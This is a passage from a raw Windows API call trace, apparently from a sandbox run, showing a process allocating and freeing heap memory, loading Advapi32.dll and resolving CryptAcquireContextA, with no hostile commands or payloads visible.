hHeap=0x1780000) returned 1 [0084.423] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0084.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0084.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0084.423] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0084.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0084.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0084.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca928 [0084.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0084.424] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0084.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0084.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0084.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0084.424] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0084.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0084.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0084.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9a0 [0084.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0084.424] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0084.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0084.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0084.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0084.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0084.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0084.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0084.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0084.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0084.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0084.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0084.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0084.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0084.425] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0084.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0084.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0084.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0084.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0084.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0084.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0084.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0084.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0084.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0084.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0084.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0084.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0084.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0084.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0084.425] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0084.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0084.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0084.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0084.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0084.426] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0084.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0084.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0084.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0084.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0084.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0084.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0084.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0084.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0084.426] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0084.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0084.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0084.426] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0084.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0084.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0084.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0084.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27d0 [0084.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0084.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0084.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0084.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0084.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7d8 [0084.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0084.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0084.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0084.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0084.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0084.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0084.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0084.427] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0084.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0084.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0084.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0084.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0084.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0084.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0084.427] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0084.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0084.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0084.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0084.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0084.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0084.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0084.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0084.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0084.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0084.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0084.428] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0084.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0084.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0084.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0084.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0084.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0084.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0084.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0084.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0084.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0084.428] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0084.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0084.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0084.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0084.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0084.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0084.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0084.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0084.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0084.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0084.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0084.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0084.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0084.429] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0084.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0084.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa18 [0084.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0084.429] PeekMessageW (in: lpMsg=0x144e584, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e584) returned 0 [0084.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0084.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0084.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0084.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0084.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0084.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0084.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0084.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0084.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0084.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0084.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0084.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0084.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0084.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0084.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0084.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0084.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0084.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0084.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0084.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0084.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0084.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0084.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0084.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0084.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0084.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0084.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0084.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0084.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0084.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0084.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0084.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0084.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0084.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0084.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0084.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0084.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0084.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0084.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0084.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0084.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0084.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0084.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0084.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0084.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0084.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0084.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0084.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0084.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0084.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0084.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0084.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0084.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0084.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0084.431] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0084.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0084.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0084.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0084.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0084.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0084.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0084.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0084.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0084.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0084.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0084.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0084.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0084.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0084.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0084.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0084.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0084.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0084.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0084.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0084.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0084.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0084.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0084.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0084.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0084.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0084.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0084.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0084.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0084.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0084.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0084.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0084.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0084.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0084.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0084.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0084.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0084.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0084.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0084.433] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0084.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0084.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0084.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0084.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0084.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0084.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0084.433] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0084.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0084.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0084.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0084.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | 